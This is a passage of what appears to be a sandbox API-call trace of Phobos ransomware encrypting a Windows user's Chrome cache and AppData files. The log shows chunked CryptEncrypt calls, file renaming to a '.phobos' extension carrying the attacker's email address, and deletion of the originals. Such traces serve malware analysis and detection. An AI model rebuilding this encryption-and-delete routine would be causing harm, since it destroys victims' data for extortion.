hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a68) returned 1 [0184.493] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.493] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0184.493] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.493] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0184.493] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.493] CloseHandle (hObject=0x17c) returned 1 [0184.493] CloseHandle (hObject=0x130) returned 1 [0184.494] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms")) returned 1 [0184.495] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0184.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.495] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=11824) returned 1 [0184.495] CloseHandle (hObject=0x130) returned 1 [0184.496] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest")) returned 0x2020 [0184.496] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.496] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.496] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.497] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0184.497] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.497] ReadFile (in: hFile=0x130, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2e30, lpOverlapped=0x0) returned 1 [0184.499] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2e40, dwBufLen=0x2e40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2e40) returned 1 [0184.499] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x2e40, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x2e40, lpOverlapped=0x0) returned 1 [0184.500] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a68) returned 1 [0184.500] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.500] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0184.500] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.500] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0184.500] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.500] CloseHandle (hObject=0x130) returned 1 [0184.500] CloseHandle (hObject=0x17c) returned 1 [0184.500] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest")) returned 1 [0184.501] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0184.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\metadata"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.502] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0184.502] CloseHandle (hObject=0x17c) returned 1 [0184.503] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0184.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.504] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=45056) returned 1 [0184.504] CloseHandle (hObject=0x17c) returned 1 [0184.504] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0")) returned 0x2020 [0184.504] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.504] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.504] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.504] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.504] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.507] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0184.507] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.507] ReadFile (in: hFile=0x17c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xb000, lpOverlapped=0x0) returned 1 [0184.574] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb010, dwBufLen=0xb010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb010) returned 1 [0184.575] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xb010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xb010, lpOverlapped=0x0) returned 1 [0184.576] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a68) returned 1 [0184.576] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.576] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30, dwBufLen=0x30 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30) returned 1 [0184.576] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.576] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe2, lpOverlapped=0x0) returned 1 [0184.576] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.576] CloseHandle (hObject=0x17c) returned 1 [0184.576] CloseHandle (hObject=0x130) returned 1 [0184.576] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0")) returned 1 [0184.578] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0184.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.582] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=270336) returned 1 [0184.582] CloseHandle (hObject=0x130) returned 1 [0184.582] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1")) returned 0x2020 [0184.583] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.583] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.583] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.583] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0184.583] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.583] ReadFile (in: hFile=0x130, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x42000, lpOverlapped=0x0) returned 1 [0184.598] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x42010, dwBufLen=0x42010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x42010) returned 1 [0184.601] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x42010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x42010, lpOverlapped=0x0) returned 1 [0184.626] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328a8) returned 1 [0184.626] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.626] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30, dwBufLen=0x30 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30) returned 1 [0184.626] CryptDestroyKey (hKey=0xa328a8) returned 1 [0184.626] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe2, lpOverlapped=0x0) returned 1 [0184.626] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.626] CloseHandle (hObject=0x130) returned 1 [0184.626] CloseHandle (hObject=0x17c) returned 1 [0184.626] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1")) returned 1 [0184.629] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0184.629] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.629] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=4202496) returned 1 [0184.629] CloseHandle (hObject=0x17c) returned 1 [0184.630] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_3")) returned 0x2020 [0184.630] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0184.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.630] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0184.630] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0184.630] ReadFile (in: hFile=0x17c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0184.699] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x156000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0184.699] ReadFile (in: hFile=0x17c, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0184.723] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x3c2000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0184.723] ReadFile (in: hFile=0x17c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0184.745] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32aa8) returned 1 [0184.745] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.745] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050) returned 1 [0184.750] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.751] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0184.756] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0102, lpOverlapped=0x0) returned 1 [0186.240] SetEndOfFile (hFile=0x17c) returned 1 [0186.240] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x3c2000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0186.240] WriteFile (in: hFile=0x17c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0186.242] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x156000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0186.242] WriteFile (in: hFile=0x17c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0186.247] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0186.247] WriteFile (in: hFile=0x17c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0186.248] CloseHandle (hObject=0x17c) returned 1 [0186.248] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0186.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0186.249] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0186.249] CloseHandle (hObject=0x17c) returned 1 [0186.249] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0186.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\first run"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0186.250] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | 